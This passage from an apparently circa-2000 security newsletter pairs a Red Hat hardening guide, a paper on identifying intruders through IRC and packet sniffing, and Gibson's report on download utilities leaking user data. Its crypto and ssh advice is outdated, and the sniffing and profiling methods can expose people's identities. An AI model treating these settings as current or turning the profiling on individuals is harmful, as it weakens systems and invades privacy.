      were left uncommented) 

       grep -v "^#" /etc/inetd.conf 

      The next place to start are the .rc scripts, these scripts determine what 
      services are started by the init process. For Red Hat, you will find these 
      scripts in /etc/rc.d/rc3.d (or /etc/rc.d/rc5.d if you automatically boot 
      to a GUI, such as Gnome or KDE).  To stop a script       from starting, 
      replace the capital S with a small s. That way you can easily start the 
      script again just by replacing the small s with a capital S. Or, if you 
      prefer, Red Hat comes with a great utility for turning off these services.  
      Just type "/usr/sbin/setup" at the command prompt, and select "System 
      Services", from there you can select what scripts are started during the 
      boot up process.  Another option is chkconfig, which you will find on most 
      distributions.  The following startup scripts may be installed by default 
      but are not critical to system functioning.  If you don't need them, turn 
      these scripts off.  The numbers in the names determine the sequence of 
      initialization, they may vary based on your distribution and version.  
      Scripts that start with a capital K instead of a captial S are used to 
      kill services that are already running. 
      
      S05apmd       (You only need this for laptops) 
      S10xntpd     (Network time protocol) 
      S11portmap   (Required if you have any rpc services, such as NIS or NFS) 
      S15sound     (Saves sound cared settings) 
      S15netfs     (This is the nfs client, used for mounting filesystems from a nfs server) 
      S20rstatd    (Try to avoid running any r services, they provide too much information to remote users) 
      S20rusersd 
      S20rwhod 
      S20rwalld 
      S20bootparamd (Used for diskless clients, you probably don't need this vulnerable service) 
      S25squid     (Proxy server) 
      S34yppasswdd (Required if you are a NIS server, this is an extremely vulnerable service) 
      S35ypserv    (Required if you are a NIS server, this is an extremely vulnerable service) 
      S35dhcpd     (Starts dhcp server daemon) 
      S40atd       (Used for the at service, similar to cron, by not required by the system) 
      S45pcmcia    (You only need this script for laptops) 
      S50snmpd     (SNMP daemon, can give remote users detailed information about your system) 
      S55named     (DNS server.  If you are setting up DNS, upgrade to the latest version of BIND,  http://www.isc.org/bind.html) 
      S55routed    (RIP, don't run this unless you REALLY need it) 
      S60lpd       (Printing services) 
      S60mars-nwe   (Netware file and print server) 
      S60nfs       (Use for NFS server, do not run unless you absolutely have to). 
      S72amd        (AutoMount daemon, used to mount remote file systems) 
      S75gated      (used to run other routing protocols, such as OSPF) 
      S80sendmail  (You can still send email if you turn this script off, you just will not be able to receive or relay) 
      S85httpd     (Apache webserver, I recommend you upgrade to the latest version, http://www.apache.org) 
      S87ypbind     (Required if you are a NIS client) 
      S90xfs       (X font server) 
      S95innd      (News server) 
      S99linuxconf  (Used to remotely configure Linux systems via browser, every black-hat's dream :) 
      
      To see how many services are running before you change the startup scripts, type 
      
      ps aux | wc -l 
      
      Once you are done with the installation and have turned off the startup scripts, type the command again and compare how the number of services have decreased. The fewer services running, the better. Also, confirm which are left running by executing the following
      command: 
      
      netstat -na --ip 
      
      Logging and Tweaking 
      Once you have eliminated as many services as possible, we want to enable logging. All system logging occurs in /var/log.   By default, Linux has excellent logging, except for ftp.  You have two options for logging for ftp, configure /etc/ftpaccess file or edit
      /etc/inetd.conf.  I prefer to edit /etc/inetd.conf, as it is simpler (i.e. harder to mess up :).  Edit /etc/inetd.conf as follows to ensure full logging of all FTP sessions. 
      
      ftp     stream  tcp     nowait  root    /usr/sbin/tcpd  in.ftpd -l -L -i -o 
      
      --- From the man pages --- 
      
      If the -l option is specified, each ftp session is logged in the syslog 
      If the -L flag is used, command logging will be on by default as soon as the ftp server is invoked.  This will cause  the  server  to log all USER commands, which if a user accidentally enters a
      password for that command instead of the username, will cause passwords to be logged via syslog. 
      If the -i option is specified, files received by the ftpd(8) server will be logged to the xferlog(5). 
      If the -o option is specified, files transmitted by the ftpd(8) server will be logged to the xferlog(5). 
      
      --- snip snip --- 
      
      Next comes tweaking. This involves various file administration. The first thing we want to do is secure our /etc/passwd file (this is the database file that holds your user accounts and passwords).  First, we want to ensure our system is using /etc/shadow, this securely
      stores everyone's password as hashes in a file only root can access.  This protects your passwords from being easily accessed and cracked (one of the first exploits a hacker looks for).  The use of shadow passwords is default as of RH 6.0, however it never hurts to
      be sure. All you have to do is type the following command as root.  This automatically  converts your passwords to the /etc/shadow file. Of all the actions you can take to secure your system, I consider this to be one of the most important. 
      
      pwconv 
      
      The second step is to remove most of the default system accounts in /etc/passwd.  Linux provides these accounts for various system activities which you may not need.  If you do not need the accounts, remove them.  The more accounts you have, the easier it is to
      access your system.  An example is the "news" account.  If you are not running nntp, a news group server, you do not need the account (be sure to update /etc/cron.hourly, as this looks for the user "news"). Also, make sure you remove the "ftp" account, as this is the
      account used for anonymous ftp.  From the man pages. 
      
      man ftpd: 
      
             Ftpd authenticates users according to four rules. 
      
             4)     If  the  user name is ``anonymous'' or ``ftp'', an anonymous ftp account must be pre-sent in the password file (user ``ftp'').  In this case the user is allowed to log in by
      specifying any password (by convention this is given as the client host's name). 
      
      For an example of my /etc/passwd file, check out example C. 
      
      We also want to modify the file /etc/ftpusers (example D). Any account listed in this file cannot ftp to the system. This restricts common system accounts, such as root or bin, from attempting ftp sessions. Linux has the file by default.  Ensure that root stays in this file,
      you never want root to be able to ftp to this system.  Ensure that any accounts that need to ftp to the box are NOT in the file /etc/ftpusers. 
      
      Also, ensure that root cannot telnet to the system. This forces users to login to the system as themselves and then su to root. The file /etc/securetty lists what ttys root can connect to.  List only tty1, tty2, etc in this file, this restricts root logins to local access only. 
      ttyp1, ttyp2, are pseudo terminals, they allow root to telnet to the system remotely (example E). 
      
      Last, create the file /etc/issue. This file is an ASCII text banner that appears for all telnet logins (example B). This legal warning will appear whenever someone attempts to login to your system. If you want to continue using the same /etc/issue file, you will have to
      modify /etc/rc.d/init.d/S99local.  By default, Linux creates a new /etc/issue file on every reboot. 
        
      
      Connecting to your server 
      For those of you who will be doing remote administration, it is critical that you develop a secured, controlled way to connect to the server.  Often, you need remote access to your server for administration or the uploading of files, these communications need to be
      secured  I will discuss two options here, ssh and TCP Wrappers. 
      
      I prefer ssh, as it encrypts all communication between you and the firewall.  TCP Wrappers will NOT protect your network traffic from sniffing.  Users can still capture all of your keystrokes  (including passwords) on the network.  If you are concerned about users
      capturing communications to your firewall, I recommend you replace telnet/ftp with ssh.  ssh will encrypt all communications to your server, allowing you both to upload files and administer the server in a secure manner.  ssh is similar to TCP wrappers in that it has its
      own layer of logging, and can limit what systems can connect to it.  For more information on ssh, you can find ssh here, including source for both ssh clients and server daemon.  I recommend you use ssh version 1.2.x, as version 2.x has a limiting license. Another ssh
      option is Openssh. 
      
      TCP Wrappers, while it does not encrypt, it does log and control who can access your system.  It is a binary that wraps itself around inetd services, such as telnet or ftp. With TCP Wrappers, the system launches the wrapper for inetd connections, logs all attempts and
      then verifies the attempt against a access control list. If the connection is permitted, TCP Wrappers hands the connection to the proper binary, such as telnet. If the connection is rejected by the access control list, then the connection is dropped.  Fortunately for us
      Linux users, TCP Wrappers is already installed, the only thing left for us to do is edit the /etc/hosts.allow and /etc/hosts.deny file.  These files determine who can and cannot access our systems.  Also, TCP Wrappers allows us to do fancy things, such as banners or
      spawn additional programs, such as safe_finger.  The syntax is relatively simple.  Put the IP address or networks in /etc/hosts.allow that you want to permit connections from.  Put IP addresses or networks in /etc/hosts.deny that you do not want to permit access.  By
      default, Linux allows connections from everyone, so you will need to modify these files.  2 recommendations when working with TCP Wrappers. 
      
         1.Use IP addresses instead of system or domain names. 
         2.Set up /etc/hosts.deny to deny everything (ALL), then permit only specific sites with /etc/hosts.allow. 
      
      For examples on how to setup /etc/hosts.allow and /etc/hosts.deny, see example F.  For more ideas on how to use TCPWrappers, check out Intrusion Detection. 
        
        
      
      For the Truly Paranoid 
      I consider the measures discussed above absolutely essential.  By following these steps, you have greatly improved your system's security, congratulations!  Unfortunately, your system is not 100% secure, nor will it ever be.  So, for the truly paranoid, I have added
      some additional steps you can take. 
      
      First we will create the wheel group.  The wheel group is a group of select individuals that can execute powerful commands, such as /bin/su. By limiting the people that can access these commands, you enhance the system security.  To create the group, vi the file
      /etc/group, create the group wheel, and add the system admins to the group.  Then identify critical system binaries, such as /bin/su.  Change the group ownership to wheel, and the permissions to owner and group executable only (be sure to maintain the suid or guid bit
      for specific binaries).  For /bin/su, the commands would be: 
      
      /bin/chgrp wheel /bin/su 
      /bin/chmod 4750 /bin/su 
      
      Second, we will lock down the files .rhosts, .netrc, and /etc/hosts.equiv.  The r commands use these files to access systems.  To lock them down, touch the files, then change the permissions to zero, locking them down. This way no one can create or alter the files. For
      example, 
      
      /bin/touch /root/.rhosts /root/.netrc /etc/hosts.equiv 
      /bin/chmod 0 /root/.rhosts /root/.netrc /etc/hosts.equiv 
      
      Third, we configure /etc/shadow to use MD5 hashes instead of the crypt(3) function.  This makes the encrypted password file far more difficult to crack.  This is done by modifying the PAM modules.  PAM (Pluggable Authentication Modules) is a suite of shared
      libraries that enable you to choose how applications authenticate users.  To learn more about PAM, check out ftp://ftp.us.kernel.org/pub/linux/libs/pam/Linux-PAM-html/pam.html. 
      
      In the old days, you had to manually modify the PAM modules to use MD5 hashes.  However, with Red Hat 6.0 or greater, you can select MD5 hashes with the setup utility.  Just type "setup" at the command prompt, then select "authentication configuration".  From
      there, you can choose to use MD5 hashes.  However, the MD5 hashes will not take effect until the user re-enters their password.  For those of you who do not have the setup utility (or have Red Hat 5.2 or earlier), you can still modify the PAM modules manually
      (example G). 
      
      For us bash users, I'm not a big fan of the .bash_history file.  I do not want people (including root) to know my command history.  So, in my .bash_profile, I export the following entry: 
      
      HISTFILESIZE=0 
      
      This means that nothing will be logged to my .bash_history file.  I will still have keystroke history and recall, the HISTSIZE env variable, but command history will not be written to the .bash_history file. 
      
      Last thing we can do is protect our system from physical access.  This mainly consists of setting up a password for our BIOS.  Also, you can password protect your system during boot-up by configuring /etc/lilo.conf with a password (password=xxx)  where xxx is
      your password.  However, keep in mind, once someone has physical access to your system, there is no guaranteed way to protect it. 
      
      IPChains 
      No discussion about Linux security would be complete without covering IPChains.  IPChains is packet filtering software that comes with the 2.2.x kernel and above. This means if you are running Red Hat 6.0 or later, you have it as part of your Linux installation kit. 
      IPChains is similar to Cisco Access Control Lists, it can control what packets can come in and out of your Linux box.  Primarly used as a firewall application, IPChains can also be used to armor your standalone Linux box.    To armor a standalone system, I configure
      IPChains to allow only TCP connections I initiate.  If anyone attempts to initate any TCP connections to me, the connection is denied.  Since IPChains is not stateful, I do allow all UDP and ICMP connections.  Last, I log all denied connections, this lets me know if
      someone out there is being naughty :)  However, I drop but do not log all the broadcat/multicast traffic, as this would quickly fill up the system logs. A simple IPChains configuration to armor a standalone system would look something like this. 
      
      bash# ipchains -L 
      Chain input (policy DENY): 
      target prot opt source destination ports 
      DENY all ------ 0.0.0.0 anywhere n/a 
      DENY all ------ anywhere 255.255.255.255 n/a 
      DENY all ------ anywhere BASE-ADDRESS.MCAST.NET/8 n/a 
      ACCEPT tcp !y---- anywhere anywhere any -> any 
      ACCEPT udp ----l- anywhere anywhere any -> any 
      ACCEPT icmp ----l- anywhere anywhere any -> any 
      DENY all ----l- anywhere anywhere n/a 
      Chain forward (policy ACCEPT): 
      Chain output (policy ACCEPT): 
      
      To see the config files for this, see example H. To learn more about using IPChains as a firewall or for a standalone system, check out the IPChains HOWTO. 
      
      Conclusion 
      We have covered some of the more basic steps involved in armoring a Linux box (Red Hat distribution). The key to a secure system is having the minimal software installed, with protection in layers, such as TCP Wrappers, IPChains, and shadowed passwords. There
      are many additional steps that can be taken, such as  tripwire (monitor changes in system binaries) and swatch (automated log monitoring and alerts). I also recommend that new Linux users check out Bastille Linux, a PERL script that can automatically secure your
      new Linux system, step by step. Remember, no system is truly 100% secure. However, with the steps outlined above, you greatly reduce the security risks. 
        
            
      @HWA
       

310.0 [IND] Paper: Tracking Hackers On Irc by Theory Group
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      http://theorygroup.com/Theory/irc.html  
       

      Tracking Hackers on IRC
      By: David Brumley [dbrumley@theory group.com]

      Few hackers are motivated purely by knowledge, science, and curiosity. Hackers continue to break into systems long after they become familiar with the technology. Instead, many continue to hack simply because of
      the social status it brings. For many, hacking *is* a social activity. Hackers meet online to discuss the latest hacking tools, their hacking conquests, and their personal life. System administrators and security
      professionals must become familiar with the social culture of hackers dwell in to be truly effective.
      
      Internet Relay Chat (IRC) has replaced electronic bulletin boards as the social mecca for internet addicts. Hackers are no expection. Cybersleuths must understand the jargon and tools used in this virtual society. By
      understanding IRC tools and jargon a cybersleuth can determine the real identity of a hackers from birthplace to current address and telephone number.
      
      System logs help administrators and security professionals track down criminals. They are useful evidence that a crime has been commited, but not much else. System logs show how and where the electronic bits came
      from, but they don't show *who* sent them. To prosecute successfully you must not only show where the intruder came from, but who was physically using the keyboard at that particular time. IRC can be a tool for
      finding out.
      
      For example, even with a full audit trail showing an intruder came from a particular account on a particular ISP, the most you can hope to obtain is billing information for the account. While sometimes sufficient, you
      still haven't show *who* was using the keyboard at the other end of the connection. The account you traced may have been stolen, set up with false billing information, or shared among several in a household. An IRC
      savvy administrator, however, may be able to determine the exact identity of the intruder. How? By listening to the hacker on IRC and reviewing configuration information on IRC tools left behind. A hacker bragging
      about compromising your host is also a full confession when logged. The IRC tools may be configured to always allow particular ISP connections, which may help in pinning down their location. With a little deductive
      reasoning you can pin down who hacked your machine, what their name is, where they live, and even their favorite corner liquor store.
      
      There are litterally dozens of IRC Networks. The most popular are DALnet, EFNet, and Undernet. Each IRC network is composed of hundreds, perhaps thousands, of channels where individuals with similar interests
      can chat real-time with each other. Channels are dynamic by nature. A channel is created the first time someone enters and destroyed when the last person leaves. The first person in a channel is also the channel
      operator, known as "chanops", or simply "ops". A channel operator is the super user for the channel: they can invite other users to the channel, set the topic, decide who can talk, and give or take operator status from
      others on the channel.
      
      On some networks, such as DALnet and Undernet, channels can be registered after creation. Registration allows the creator to become a channel operator every time they log on to their channel. Registration assigns
      ownership of a channel.
      
      Many IRC networks, including the ever popular EFNet, don't have channel registration. When you leave a channel, you leave all your privileges in that channel as well. You must be re-op'ed every time you join the
      channel. Hackers love dynamic networks like these because it allows them to take over channels. Hackers will force all legitimate users out of a channel until they are all that is left. When they are the only ones in the
      channel, they can op themselves. The primary method for forcing users off of a channel are Denial of Service (DoS) attacks. If the victims computer is swamped by a DoS, it will time out and disconnect from IRC.
      
      Hackers who participate in these dynamic IRC networks have one primary goal: to keep operator status on the channels they frequent. To do this they must protect against others trying to take over their channel, rogue
      administrators randomly de-oping them, and deal with the inevitable denial of service attack. To solve these problems, hackers have come up with ingenious ways to create redundant connections from multiple hosts to
      and IRC network.
      
      The simplest solution is to run multiple IRC clients, such as ircII or BitchX from several hosts. By running the clients under screen(1), a unix terminal multiplexer, they can detach IRC sessions into the background and
      reattach to them later. Each session corresponds to one nickname on the IRC network. If one host goes down, he can always re-attach to a running session on another machine. Since each nickname has operator
      status, the whole scheme is redundant. It is up to the intruder, however, to maintain daily every IRC session on every host - a very labor intesive activity.
      
      IRC 'bots', short for robot, solve the problem of 'hands-on' administration. The purpose of a bot is to sit on IRC and monitor channels for events. In a very simple sense bots are only automated IRC clients. Running
      stand alone, a bot will automatically op friends (as specified in the configuration file), enforce bans for channel misuse, and provide some channel misuse control . The true power of bots, however, is their ability to link
      together to form "botnets". Each bot on a botnet serves as a redundant backup, automatically oping friends and other bots, enforcing channel bans, and ensuring a party line exists.
      
      Each bot on the botnet is a node. The botnet administrator appoints a master node, with the rest becoming slaves. The master node is in charge of distributing botnet configuration information with each slave. After
      initial configuration, the botnet administrator need only change configuration information on the master. The master will then automatically take care of updating all the sub-nodes.
      
      To add a bot to the network only a simple and static configuration file that specifies the master is needed. Once the new bot starts up, it will automatically contact the master and pull over the requisite configuration
      information to become a node on the botnet. The advantage to a hacker is enormous. For each new account or system compromise, the hacker need only upload the actual executable and a simple configuration file.
      Once started, the new bot automatically downloads all information including current lists of channels, friends, and users. The new bot will also then automatically update every time the configuration on the master is
      changed.
      
      The most famous bot is "eggdrop", available at http://www.eggdrop.net. It serves as a good model for the typical bot. It's configuration file is divided up into three logical sections (sometimes in three separate files,
      sometimes merged into one): user information, channel information, and bot information.
      
      Channel information can be recognized by the "channel add" TCL command. Following the channel name are a list of options to apply to that channel. A sample eggdrop channel file looks like:
      
      
              channel add #myhacker {
                      chanmode "+ismt"
                      dont-idle-kick
                      +userbans
                      +protectops
              }
      
      The chanmode defines what mode the channel should be. In this particular example channel #myhacker is invite only (i), secret (s), moderated so that only channel operators can talk (m), and only channel operators
      can change topics (t).
      
      The last three items define eggdrop configuration variables. Entries that begin with a plus (+) will enable options, entries that begin with a minus (-) will disable options. Entries will neither a plus or minus simply define
      a variable, i.e. make it true. In this particular example the bot will not kick idle users from #myhack, it will let user operators (as opposed to other bots on the botnet) ban people, and will automatically re-op de-oped
      users. For a full list of options, see the example configuration file that comes with the eggdrop distribution.
      
      A user entry for an eggdrop bot can consist of four lines. The first line is always contains the nickname, password, and flags of the bot user. The remaining three lines all use the first two characters to identify the type
      of configuration information. Entries that start with a "-" list user identifier. To a bot, a user's identity is not their nickname, but the username@hostname.domain.zone where they are connecting from.
      
      A line that begins with ":" is a botnet configuration entry. It lists HOSTNAME:PORT that the particular bot for that user will listen on. When two bots communicate they use the port on the host listed.
      
      Lines that begin with "!!" or "." contain time stamp information on the user. Entries beginning with "!!" are the channel name and time stamp where the user was last seen by the bot. Entries with "." are the
      modification time of the entry itself. All times are kept in UNIX epoch format.
      
      User files often contain dozens of bot users. If you've found an eggdrop configuration file on a compromised host, chances are most of the entries in the file are also compromised hosts or accounts. A quick note to the
      administrator of each domain explaining that you've found a hacker configuration file that references his domain is appropriate. You can also use the information in creating an MO (Modus Operundi) file for the
      hacker. People listed in the user file are often friends of the hacker (whom you may see in the future :) or alternate nicknames the hacker may be using.
      
      Here's an example of eggdrop user file:
      
      
      eleet     lypmjwfp2ee         fbs                      /0 0 0 0
      -         *!eleet@*.elaine.Stanford.EDU, *!eleet@*.myth.stanford.edu
      :         firebird.stanford.edu:60000
      !!        895178133 #stanford
      .         {created 894412528}
      
      Hackers often will not connect to IRC directly. By using a variety of hosts a hacker can subvert a ban, trick others into thinking he is someone else, or connect to an IRC server that limits connections. Most often,
      though, it is to hide his real IP address in case someone is watching them.
      
      A "bounce" program reads from one port and writes to another, i.e. a proxy. The most famous bounce programs are BNC and WinGate. Both accept a TCP connection, connect to a destination, and then relay
      anything from the original connection to the destination. The primary legitimate use for WinGates are SOCKS and TCP proxys to the internet. Although WinGates can be configured to require a password, most are
      not. When a hacker has access to a wingate he can "bounce" through the wingate server to hide his tracks.
      
      BNC, the word "bounce" with the vowels removed, are UNIX based proxy's designed primarily for "bouncing" IRC traffic. While a WinGate can proxy multiple ports, a BNC runs as a daemon listening to only one
      port. After accepting a connection, they too proxy information read on the original connection to a destination. In addition to simple proxying, the BNC configuration file allows for creating fake ident responses, virtual
      host configuration, and limiting the number of users who can use the bounce.
      
      Since these processes run for extended periods of time, a hacker will often try to hide them from an administrator. If a hacker has superuser access and is skillful he can hide any process from any administrator.
      Luckily many hackers are sloppy or lazy. Often they will just change the name of the program do be something innocuous. A local favorite seems to be "pine". The hacker runs the process under the new name hoping
      that the administrator will not notice.
      
      Because hackers are adept at hiding process names, you should always be aware of the network connections your host generates. netstat(1m) and lsof (http://vic.cc.purdue.edu/pub/tools/lsof_4.45_W.tar.gz) are good
      tools for monitoring local network connections. An administrator should also be wary of local processes, such as "./pine" or "./emacs" binding to unusual ports. It's a safe bet that pine doesn't listen to port 6666 and
      write to irc.erols.com.
      
      After you've identified a hacker is on your system, and they appear to be using IRC, consider setting up a network sniffer. (Please make sure you talk to your institutions legal department and are aware of all applicable
      laws.) Network dumps are valuable because little, if any, IRC activity is encrypted. Even if a hacker uses an encrypted client to log in, such as SSH, the actual connection to the IRC server will most likely be in
      clear-text.
      
      TCPDump (available from ftp://ftp.ee.lbl.gov) is the standard packet sniffer on most Unix hosts. By default it only captures the first few bytes of every transaction: just enough to diagnose routing and network
      problems. When your interested in logging entire sessions it's important to read all available packet information. With TCPDump, the -s option controls how much data in each packet is collected. Consult your network
      MTU to determine the optimum setting. We use:
      
      
       # /usr/sbin/tcpdump -n -s 1600 -F  -w tcpdump.
      
      A quick and easy way to view the dump is to use the Unix command strings(1). If to much information is picked up, you can separate your tcpdump file using:
      
      
        # /usr/sbin/tcpdump -r tcpdump. -w  
      
      
      and then run strings again on the output file. For example, if you're only concerned with IRC traffic (which normally is on port 6667), use:
      
      
        # /usr/sbin/tcpdump -r tcpdump. -w irc. dst port 6667
        # strings irc.
      
      After gathering as much information about the hacker as possible through a packet dump and information from the various IRC configuration files, compile an M.O. (Modus Operundi) file. The M.O. should contain
      information such as the hacker's preferred nickname and any variations used, any dial-ups used, any related incidents, and any personal information discovered.
      
      On several occasions I have picked up the exact age, name, and location of the hacker! This type data is invaluable when contacting law enforcement and correlating various incidents. I've found plotting the
      information on a map is a good way to provide a quick reference of active hackers.
      
      On a slow afternoon I have also been known to go back to the M.O. files and check to see who is on IRC. If I believe I see the same hacker I'll send a quick note to the administrator of the domain, alerting them to a
      potential problem. Sometimes it turns out to be nothing, but the message is always appreciated.
      
      I use ircii (available from http://www.irchelp.org/irchelp/ircii/), the classic UNIX irc client, and primarily connect to EFnet. (Macintosh and PC users should check out http://www.irchelp.org for a list of clients).
      Generally the unix clients are safe as long as you use common sense. Don't accept files from strangers, don't run untrusted IRC scripts, and never run commands you don't understand. With most clients all IRC
      commands start with a forward slash ("/"). Everything else is a message sent to the channel.
      
      After connecting, the first thing I do is start a log. With ircii, the command is:
      
      
              /set log on
      
      The logfile will be named IrcLog. To change names, type:
      
      
              /set logfile 
      
      To look for a person, use the "who" command:
      
      
              /who -nick  (looks for a particular nickname)
              /who -host  (looks for anyone using a particular host)
      
      Wildcards are allowed. However users marked as "invisible" will only show if you specify their exact nickname.
      
      When checking IRC, be sure to look for all variations of the nickname. Hackers have the habit of logging in from a hacked site on a secondary nickname, while logged in with their primary nickname on their dial-in
      account. For example, perhaps there is a hacker who goes by the nickname "eleet". Querying IRC for eleet and eleet_ might show:
      
      
      
      *       eleet   H*  user@ppp-7.isp.net
      *       eleet_  H*  root@www.companyname.com
      
      Chances are that www.companyname.com has been hacked. Even more interesting is that the person who did it probably, though not certainly as ident responses can be faked, is also using the dialup ppp-7.isp.net.
      One note of caution: when using IRC use the who command, not whois
      
      
              /who -nick 
      
      
      will give you information on the nickname.
      
      
              /whois 
      
      
      will give you more information, but also notify the user that someone is querying their nickname.
      
      Due to the number of hackers using IRC it is often the target of criticism, but there are thousands of legitimate users who use the IRC networks daily. Like any other community there will always be a criminal element.
      When hackers do use IRC it allows the administrator to monitor the criminal element and gain insight into their methodologies and habits. The acquisition of this knowledge can help system administrators, law
      enforcement, and security professionals track and prosecute hackers more effectively.
      
      Reference sites:
      
           http://www.eggxpress.com - Information on eggdrop, BNC, and BitchX configuration files 
           http://www.eggdrop.net - The home of eggdrop 
           http://www.irchelp.org - Provides introductory documents and tutorials for using IRC 
           http://metalab.unc.edu/dbarberi/papers/chats - Papers about the social perspective of IRC 
           http://www.efnet.net - The popular EFNet, a dynamic IRC network and a favorite of many hackers 
           http://www.undernet.org - The Undernet IRC network. 
           http://www.newnet.net - The NewNET IRC network. 
           http://www.self-evident.org - Dedicated to news on EFnet, including information on hackers and channels they frequent. 
      
      
      
      @HWA
      
      
311.0 [IND] More spies in the wires..software that snoops on you and more.
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Snarfed from Packetstorm.securify.com 

      URL: grc.com/downloaders.htm
       
      Our Site of the Week is The Anatomy of File Download Spyware.

      "Spyware" is a name given to software which secretly tells its 
      manufacturer your personal information. This page investigates 
      the spyware-like features which come installed with RealNetworks
      RealDownload, Netscape/AOL Smart Download, and NetZip Download 
      Demon utilities.RealNetworks RealDownload turns out not only to
      send the URL of the files you download, but the Windows GUID, 
      a unique identifier which includes each computers MAC address. 
      
      Info from the site:
     
      The Anatomy of File Download Spyware
      by Steve Gibson, Gibson Research Corporation  --  2000/7/14

      Page Updated: Wednesday, July 26th, 2000
      (only added a link to my telephone appearance on ZDTV.)
      
      What do the NetZip-descended file downloaders whisper when
      they think you are not listening?

      OVERVIEW:  How Does This Affect YOU ?

      As you will see on the page below, if you use the RealNetworks 
      RealDownload, Netscape/AOL Smart Download, or NetZip Download Demon 
      utilities in their default configuration . . . 

      EVERY TIME you use one of these utilities to download ANY FILE from 
      ANYWHERE on the Internet, the complete "URL address" of the file, along 
      with a UNIQUE ID TAG that has been assigned to YOUR machine, and   in the 
      case of Netscape's SmartDownload only   YOUR computer's individual 
      Internet IP address, is immediately transmitted to the program's 
      publisher.

      This allows a database of your entire, personal, file download history to 
      be assembled and uniquely associated with your individual computer . . . 
      for whatever purpose the program's publishers may have today, or tomorrow. 

      VERY IMPORTANT: When I re-examined my findings in the face of 
      RealNetworks' insistence that I was absolutely wrong about my conclusions, 
      I caught something that I had missed before: My exact personal name and 
      private eMail address was being sent back to RealNetworks whenever I 
      downloaded a file. When I confronted RealNetworks with this, they 
      explained that it was due to the fact that I had purchased a product from 
      them in the past, and the "cookie" my system had received during the 
      purchase was being returned to them.

      That certainly makes file downloads seem far less "anonymous" than 
      RealNetworks continues to allege. (Full details are provided below.)


      The Saga Unfolds . . . 
      Friday,
      July 14
      
      I download fresh copies of all three Download Demon-descended file 
      downloading utilities and conduct a series of tests to verify the rumors 
      I've heard about their "phoning home" behavior. 

      In each case, the behavior I examined resulted from each program's 
      "default configuration" which is enabled unless deliberately disabled by 
      the user. I confirmed that all three programs send a report back to their 
      publishers whenever the program is used to download any file through the 
      Internet. This report includes the full URL of the file being downloaded 
      and an "ID Tag" which could be used to uniquely identify the downloading 
      computer. 

      In the case of Netscape's Smart Download, the computer's individual 
      Internet IP address is also sent as a "cookie header" which would tend to 
      defeat IP-masking proxies and anonymizers. 

      Since I was quite alarmed by what I had found and then carefully 
      confirmed, I immediately began notifying the 338,584 members (currently) 
      of my User Managed eMail Notification System and I created a new 
      discussion newsgroup to contain our subsequent public discussion of this 
      issue. 

      Monday,
      July 17
      
      By Certified Mail I receive RealNetworks' threat letter   which I ignore 
      because it's just so much nonsense   and proceed to initiate a very 
      constructive dialog with two representatives of RealNetworks. Their V.P. 
      of Government Affairs and Privacy informs me that I am absolutely, 
      totally, and completely mistaken and insists that I immediately take this 
      page down and retract all of my public statements to everyone who has 
      received them. (I guess he must have read Robert Kimball's letter too.) 

      I refuse to remove the page based solely upon his forceful representations 
      and assurances. But I worry   in the face of their legal threats   that I 
      might somehow have been completely mistaken. So I quickly post a big red 
      notice at the top of this page to notify its readers that RealNetworks is 
      very sure that I am completely wrong, and that I am immediately working to 
      re-verify all of my findings. 

      Then a much more serious RealDownload privacy concern rears its ugly head:

      It's Monday afternoon, and everything still comes out just the way it did 
      Friday. (In other words, I was right all along.) However, this time I 
      happen to notice that my actual first and last name, and my own private 
      eMail alias address are also being transmitted to RealNetworks as a result 
      of each file download. So I immediately forward the captured packet to the 
      RealNetworks representatives with whom I'm working and ask them what is 
      going on. 

      By phone the technical manager with whom I'm speaking asks if I've ever 
      purchased anything from Real? I explain that a few months ago I purchased 
      "Real Producer" in order to produce streaming content for my web site. So 
      she explains that my purchase and interaction with their eCommerce server 
      left a "cookie" on my computer which included my real name and personal 
      eMail address from the purchase transaction. 

      I see.  So now my private information   which was obtained by RealNetworks 
      during a SECURE PURCHASE TRANSACTION with an explicit commitment for 
      security, privacy, and secrecy   is being sent back to Real   months later   
      "in the clear" with no security, every time I download arbitrary files 
      from the Internet using their utility   along with the full name of the 
      file I downloaded and the unique ID that could be used to identify my 
      computer. 

      I think that's a "Real" problem. And it would certainly seem to contradict 
      RealNetworks' repeated statements that it is not possible for them to 
      associate my use of RealDownload with any personally identifiable 
      information. If my name and private eMail address aren't "personally 
      identifiable information", what is? Moreover, that personal information 
      could be easily associated with the file download which directly triggered 
      the transmission of that information. 

      Based upon my understanding of how and why this happens, this is easily 
      reproducible and is apparently going on all the time with RealNetworks 
      customers . . . like right now. If what I've been told by the RealNetworks 
      technical manager is true   and it certainly fits the facts and logic   it 
      appears that anyone who has purchased a RealNetworks product through their 
      eCommerce system receives an insecure, plaintext, cookie containing their 
      actual name and eMail address. I certainly did. And this cookie is then 
      sent back to RealNetworks . . . 

      . . . even in situations where users of RealNetworks'
      products have been repeatedly and even forcefully
      assured of their absolute anonymity.

      Whoops. 

      On a Technical Point:

      RealNetworks has stated repeatedly that they care about their user's privacy. And they tell us that they are "the leader in the delivery of Internet media." Monday they told
      me that they employ 400 programmers. With all that, wouldn't you be inclined to presume that they had a grasp on Internet Technology? 

      If they care about our privacy, why are they storing
      my real name and private eMail address   from an
      eCommerce transaction   as "plain text" in a cookie,
      and sending it out without any security whatsoever?

      Even if it weren't being sent back due to a file download it would still be a significant privacy concern. Why not, instead, use a cookie the way it was intended to be used?
      A cookie should be an "opaque token"; an apparently meaningless string of characters, which only has meaning to the entity which created it.



      But none of that was the problem I was facing at the moment. (Perhaps we'll deal with that one next.) I was working to demonstrate to the RealNetworks representatives the
      absolute truth of what I'd been saying about the transmission of a system-unique ID. 

      So, using RealDownload, I downloaded three different files over the course of several hours and from different Internet servers. I captured each resulting 'downloadid' as it was
      leaving my computer on its way to RealNetworks:

      downloadid=9B1450495BF211D4A025002018252799
      *
      downloadid=9B14504A5BF211D4A025002018252799
      *
      downloadid=9B14504B5BF211D4A025002018252799

      As you can see, they differ by a single character, and that character is changing from "9" to "A" to "B" which indicates standard hexadecimal counting. So I sent these
      'downloadids' to the RealNetwork representatives. This apparently puzzled Real's technical manager who said that she'd have to get back to me on it. When she called back she
      explained that, sure enough, they had succeeded in duplicating the same behavior in their labs and . . . that it must be a bug. 

      A "bug"??   Yeah . . . okay . . . I guess that would be a big one? 

